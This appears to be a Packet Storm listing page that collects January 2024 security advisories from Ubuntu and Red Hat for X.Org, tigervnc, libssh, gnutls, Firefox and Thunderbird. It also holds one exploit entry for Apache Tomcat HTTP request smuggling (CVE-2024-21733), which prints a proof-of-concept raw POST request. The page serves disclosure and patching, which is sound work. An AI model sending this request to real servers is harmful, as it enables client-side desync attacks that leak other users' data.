Ubuntu Security Notice 6587-4 - USN-6587-1 fixed vulnerabilities in X.Org X Server. The fix was incomplete resulting in a possible regression. This update fixes the problem. Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled memory when processing the DeviceFocusEvent and ProcXIQueryPointer APIs. An attacker could possibly use this issue to cause the X Server to crash, obtain sensitive information, or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6587-4  
February 01, 2024

xorg-server, xwayland regression  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

A regression was fixed in X.Org X Server.

Software Description:  
- xorg-server: X.Org X11 server

Details:

USN-6587-1 fixed vulnerabilities in X.Org X Server. The fix was incomplete  
resulting in a possible regression. This update fixes the problem.

Original advisory details:

 Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled  
 memory when processing the DeviceFocusEvent and ProcXIQueryPointer APIs. An  
 attacker could possibly use this issue to cause the X Server to crash,  
 obtain sensitive information, or execute arbitrary code. (CVE-2023-6816)

 Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled  
 reattaching to a different master device. An attacker could use this issue  
 to cause the X Server to crash, leading to a denial of service, or possibly  
 execute arbitrary code. (CVE-2024-0229)

 Olivier Fourdan and Donn Seeley discovered that the X.Org X Server  
 incorrectly labeled GLX PBuffers when used with SELinux. An attacker could  
 use this issue to cause the X Server to crash, leading to a denial of  
 service. (CVE-2024-0408)

 Olivier Fourdan discovered that the X.Org X Server incorrectly handled  
 the curser code when used with SELinux. An attacker could use this issue to  
 cause the X Server to crash, leading to a denial of service.  
 (CVE-2024-0409)

 Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled  
 memory when processing the XISendDeviceHierarchyEvent API. An attacker  
 could possibly use this issue to cause the X Server to crash, or execute  
 arbitrary code. (CVE-2024-21885)

 Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled  
 devices being disabled. An attacker could possibly use this issue to cause  
 the X Server to crash, or execute arbitrary code. (CVE-2024-21886)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  xserver-xorg-core               2:1.19.6-1ubuntu4.15+esm5  
  xwayland                        2:1.19.6-1ubuntu4.15+esm5

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  xserver-xorg-core               2:1.18.4-0ubuntu0.12+esm10  
  xwayland                        2:1.18.4-0ubuntu0.12+esm10

After a standard system update you need to reboot your computer to make all  
the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6587-4  
  https://ubuntu.com/security/notices/USN-6587-1  
  https://launchpad.net/bugs/2051536

Ubuntu Security Notice USN-6587-4

Apache Tomcat suffers from a client-side de-sync vulnerability via HTTP request smuggling. Apache Tomcat versions 8.5.7 through 8.5.63 and 9.0.0-M11 through 9.0.43 are vulnerable.

    # Exploit Title: CVE-2024-21733 Apache Tomcat HTTP Request Smuggling# Date: 1/31/2024# Exploit Author: xer0dayz# Vendor Homepage: https://tomcat.apache.org/# Software Link: https://tomcat.apache.org/# Version: 8.5.7 to 8.5.63 or 9.0.44 or later# CVE : CVE-2024-21733## Description:Apache Tomcat from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43 are vulnerable to client-side de-sync attacks.Client-side de-sync (CSD) vulnerabilities occur when a web server fails to correctly process the Content-Length of POST requests. By exploiting this behavior, an attacker can force a victim's browser to de-synchronize its connection with the website, causing sensitive data to be smuggled from the server and/or client connections.## Remediation:Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.## Credit:This vulnerability was reported responsibly to the Tomcat security team by xer0dayz from Sn1perSecurity LLC.## History:2024-01-19 Original advisory## Full Security Advisory: https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz## Full Write-Up: https://sn1persecurity.com/wordpress/cve-2024-21733-apache-tomcat-http-request-smuggling/## PoC/Exploit:POST / HTTP/1.1Host: hostnameSec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: keep-aliveContent-Length: 6Content-Type: application/x-www-form-urlencodedXSent with [Proton Mail](https://proton.me/) secure email.

Apache Tomcat 8.5.63 / 9.0.43 HTTP Response Smuggling

Red Hat Security Advisory 2024-0629-03 - An update for tigervnc is now available for Red Hat Enterprise Linux 7. Issues addressed include a buffer overflow vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0629.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: tigervnc security update  
Advisory ID:        RHSA-2024:0629-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0629  
Issue date:         2024-01-31  
Revision:           03  
CVE Names:          CVE-2023-6816  
====================================================================

Summary: 

An update for tigervnc is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.

Security Fix(es):

* xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (CVE-2023-6816)

* xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229)

* xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885)

* xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6816

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2256540  
https://bugzilla.redhat.com/show_bug.cgi?id=2256542  
https://bugzilla.redhat.com/show_bug.cgi?id=2256690  
https://bugzilla.redhat.com/show_bug.cgi?id=2257691

Red Hat Security Advisory 2024-0629-03

Red Hat Security Advisory 2024-0628-03 - An update for libssh is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0628.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libssh security updateAdvisory ID:        RHSA-2024:0628-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0628Issue date:         2024-01-31Revision:           03CVE Names:          CVE-2023-48795====================================================================Summary: An update for libssh is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:libssh is a library which implements the SSH protocol. It can be used to implement client and server applications.Security Fix(es):* ssh: Prefix truncation attack on Binary Packet Protocol (BPP) (CVE-2023-48795)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-48795References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2254210

Red Hat Security Advisory 2024-0628-03

Red Hat Security Advisory 2024-0627-03 - An update for gnutls is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0627.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: gnutls security updateAdvisory ID:        RHSA-2024:0627-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0627Issue date:         2024-01-31Revision:           03CVE Names:          CVE-2024-0553====================================================================Summary: An update for gnutls is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The gnutls packages provide the GNU Transport Layer Security (GnuTLS) library, which implements cryptographic algorithms and protocols such as SSL, TLS, and DTLS.Security Fix(es):* gnutls: incomplete fix for CVE-2023-5981 (CVE-2024-0553)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0553References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2258412

Red Hat Security Advisory 2024-0627-03

Red Hat Security Advisory 2024-0626-03 - An update for tigervnc is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a buffer overflow vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0626.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: tigervnc security update  
Advisory ID:        RHSA-2024:0626-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0626  
Issue date:         2024-01-31  
Revision:           03  
CVE Names:          CVE-2023-6816  
====================================================================

Summary: 

An update for tigervnc is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.

Security Fix(es):

* xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (CVE-2023-6816)

* xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229)

* xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885)

* xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6816

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2256540  
https://bugzilla.redhat.com/show_bug.cgi?id=2256542  
https://bugzilla.redhat.com/show_bug.cgi?id=2256690  
https://bugzilla.redhat.com/show_bug.cgi?id=2257691

Red Hat Security Advisory 2024-0626-03

Red Hat Security Advisory 2024-0625-03 - An update for libssh is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0625.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libssh security updateAdvisory ID:        RHSA-2024:0625-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0625Issue date:         2024-01-31Revision:           03CVE Names:          CVE-2023-48795====================================================================Summary: An update for libssh is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:libssh is a library which implements the SSH protocol. It can be used to implement client and server applications.Security Fix(es):* ssh: Prefix truncation attack on Binary Packet Protocol (BPP) (CVE-2023-48795)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-48795References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2254210

Red Hat Security Advisory 2024-0625-03

Red Hat Security Advisory 2024-0619-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include bypass, out of bounds write, and privilege escalation vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0619.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:0619-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0619  
Issue date:         2024-01-31  
Revision:           03  
CVE Names:          CVE-2024-0741  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 115.7.0.

Security Fix(es):

* Mozilla: Out of bounds write in ANGLE (CVE-2024-0741)

* Mozilla: Failure to update user input timestamp (CVE-2024-0742)

* Mozilla: Crash when listing printers on Linux (CVE-2024-0746)

* Mozilla: Bypass of Content Security Policy when directive unsafe-inline was set (CVE-2024-0747)

* Mozilla: Phishing site popup could show local origin in address bar (CVE-2024-0749)

* Mozilla: Potential permissions request bypass via clickjacking (CVE-2024-0750)

* Mozilla: Privilege escalation through devtools (CVE-2024-0751)

* Mozilla: HSTS policy on subdomain could bypass policy of upper domain (CVE-2024-0753)

* Mozilla: Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7 (CVE-2024-0755)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-0741

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2259926  
https://bugzilla.redhat.com/show_bug.cgi?id=2259927  
https://bugzilla.redhat.com/show_bug.cgi?id=2259928  
https://bugzilla.redhat.com/show_bug.cgi?id=2259929  
https://bugzilla.redhat.com/show_bug.cgi?id=2259930  
https://bugzilla.redhat.com/show_bug.cgi?id=2259931  
https://bugzilla.redhat.com/show_bug.cgi?id=2259932  
https://bugzilla.redhat.com/show_bug.cgi?id=2259933  
https://bugzilla.redhat.com/show_bug.cgi?id=2259934

Red Hat Security Advisory 2024-0619-03

Red Hat Security Advisory 2024-0618-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include bypass, out of bounds write, and privilege escalation vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0618.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:0618-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0618  
Issue date:         2024-01-31  
Revision:           03  
CVE Names:          CVE-2024-0741  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.7.0 ESR.

Security Fix(es):

* Mozilla: Out of bounds write in ANGLE (CVE-2024-0741)

* Mozilla: Failure to update user input timestamp (CVE-2024-0742)

* Mozilla: Crash when listing printers on Linux (CVE-2024-0746)

* Mozilla: Bypass of Content Security Policy when directive unsafe-inline was set (CVE-2024-0747)

* Mozilla: Phishing site popup could show local origin in address bar (CVE-2024-0749)

* Mozilla: Potential permissions request bypass via clickjacking (CVE-2024-0750)

* Mozilla: Privilege escalation through devtools (CVE-2024-0751)

* Mozilla: HSTS policy on subdomain could bypass policy of upper domain (CVE-2024-0753)

* Mozilla: Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7 (CVE-2024-0755)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-0741

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2259926  
https://bugzilla.redhat.com/show_bug.cgi?id=2259927  
https://bugzilla.redhat.com/show_bug.cgi?id=2259928  
https://bugzilla.redhat.com/show_bug.cgi?id=2259929  
https://bugzilla.redhat.com/show_bug.cgi?id=2259930  
https://bugzilla.redhat.com/show_bug.cgi?id=2259931  
https://bugzilla.redhat.com/show_bug.cgi?id=2259932  
https://bugzilla.redhat.com/show_bug.cgi?id=2259933  
https://bugzilla.redhat.com/show_bug.cgi?id=2259934

Red Hat Security Advisory 2024-0618-03

Red Hat Security Advisory 2024-0617-03 - An update for tigervnc is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0617.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: tigervnc security updateAdvisory ID:        RHSA-2024:0617-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0617Issue date:         2024-01-31Revision:           03CVE Names:          CVE-2023-6816====================================================================Summary: An update for tigervnc is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.Security Fix(es):* xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (CVE-2023-6816)* xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229)* xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885)* xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6816References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2256540https://bugzilla.redhat.com/show_bug.cgi?id=2256542https://bugzilla.redhat.com/show_bug.cgi?id=2256690https://bugzilla.redhat.com/show_bug.cgi?id=2257691

Tag

#linux